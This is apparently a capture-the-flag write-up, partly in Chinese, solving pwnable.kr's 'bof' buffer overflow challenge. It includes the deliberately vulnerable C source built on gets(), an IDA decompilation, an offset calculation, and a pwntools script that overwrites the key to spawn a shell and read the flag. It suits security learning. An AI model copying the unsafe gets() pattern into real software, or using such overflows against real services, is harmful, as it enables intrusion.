question 1 2 3 4 5 6 7 Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000
先看下文件,然后nc上去进行数据输入
bof.c 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; }
analyse 把bof拖进IDA里看下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 unsigned int __cdecl func(int a1) { char s; // [esp+1Ch] [ebp-2Ch] unsigned int v3; // [esp+3Ch] [ebp-Ch] v3 = __readgsdword(0x14u); puts("overflow me : "); gets(&s); if ( a1 == -889275714 ) system("/bin/sh"); else puts("Nah.."); return __readgsdword(0x14u) ^ v3; }
在main函数调用func时,留出位置给key,所以让buffer溢出到key,填入0xcafebabe即可。IDA告诉我们s的位置位于ebp-2Ch处,而key的位置在ebp+8h处。中间要填上52个字节。
get flag 写python脚本如下:
1 2 3 4 5 from pwn import * ssh = remote("pwnable.kr",9000) payload = "a"*52+p32(0xcafebabe) ssh.send(payload) ssh.interactive()
运行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 ubuntu@VM-0-3-ubuntu:~$ python bof.py [+] Opening connection to pwnable.kr on port 9000: Done [*] Switching to interactive mode $ ls bof bof.c flag log log2 super.pl $ cat flag daddy, I just pwned a buFFer :) $ [*] Closed connection to pwnable.kr port 9000
flag:daddy, I just pwned a buFFer :)
